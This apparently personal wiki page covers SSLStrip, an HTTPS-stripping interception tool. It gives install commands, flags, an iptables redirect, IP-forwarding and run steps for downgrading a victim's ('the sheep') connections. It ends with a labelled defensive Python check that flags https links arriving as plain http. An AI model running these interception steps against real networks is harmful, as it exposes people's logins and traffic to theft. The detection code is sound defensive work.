From charlesreid1

A tool from Moxie Marlinspike

Also see SSLSniff


Source Code


Moxie's page:


On Kali:

$ apt-get install sslstrip

On other systems:

$ git clone
$ cd sslstrip
$ python setup.py build && python setup.py install

Getting Help

$ sslstrip -h

Important flags:

-w - specifies log file

-p - logs only SSL POSTs

-a - logs all SSL and HTTP traffic

-l port - port to listen on

Basic Usage

SSLStrip listens for traffic on a particular port, so we need an iptables rule that selectively redirects web traffic (destination port 80 in the rule below) to SSLStrip. We'll assume SSLStrip is running on port 6666.

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Now any HTTPS connections that would have been made through it are turned into HTTP connections, with their encryption layer stripped. SSLStrip also keeps track of which requests have been stripped, so that when the corresponding HTTP request from the sheep is received, it is forwarded along to the server over HTTPS.

Also make sure your machine forwards packets it receives:

$ echo "1" > /proc/sys/net/ipv4/ip_forward

Now run sslstrip:

$ sslstrip -l 6666
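
A defender-side check for the stripping described above, as an added example that is not from the original page or from SSLStrip: it compares a copy of a page fetched over a trusted path with the copy a client actually received, and reports `https://` URLs that arrived only as `http://`. The HTML samples, the `example.test` host and all function names are constructed for illustration, and the baseline is assumed to come from a path that is not subject to interception.

```python
from html.parser import HTMLParser

# Attributes that carry URLs a client will follow or submit data to.
URL_ATTRS = {"href", "src", "action"}

class LinkCollector(HTMLParser):
    """Collects URL-bearing attribute values from every start tag."""
    def __init__(self):
        super().__init__()
        self.urls = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.urls.add(value.strip())

def collect_urls(html):
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.urls

def find_downgraded(baseline_html, observed_html):
    """Return https:// URLs from the baseline that the observed copy
    carries only in http:// form."""
    observed = collect_urls(observed_html)
    hits = []
    for url in collect_urls(baseline_html):
        if url.lower().startswith("https://"):
            plain = "http://" + url[len("https://"):]
            if plain in observed and url not in observed:
                hits.append(url)
    return sorted(hits)

# Constructed sample: the page as served to a trusted vantage point.
BASELINE = """<html><body>
<a href="https://example.test/login">Sign in</a>
<form action="https://example.test/session" method="post"></form>
<img src="http://example.test/logo.png">
</body></html>"""

# Constructed sample: the same page as received on the suspect network.
OBSERVED = """<html><body>
<a href="http://example.test/login">Sign in</a>
<form action="http://example.test/session" method="post"></form>
<img src="http://example.test/logo.png">
</body></html>"""

if __name__ == "__main__":
    for url in find_downgraded(BASELINE, OBSERVED):
        print("downgraded:", url)
```
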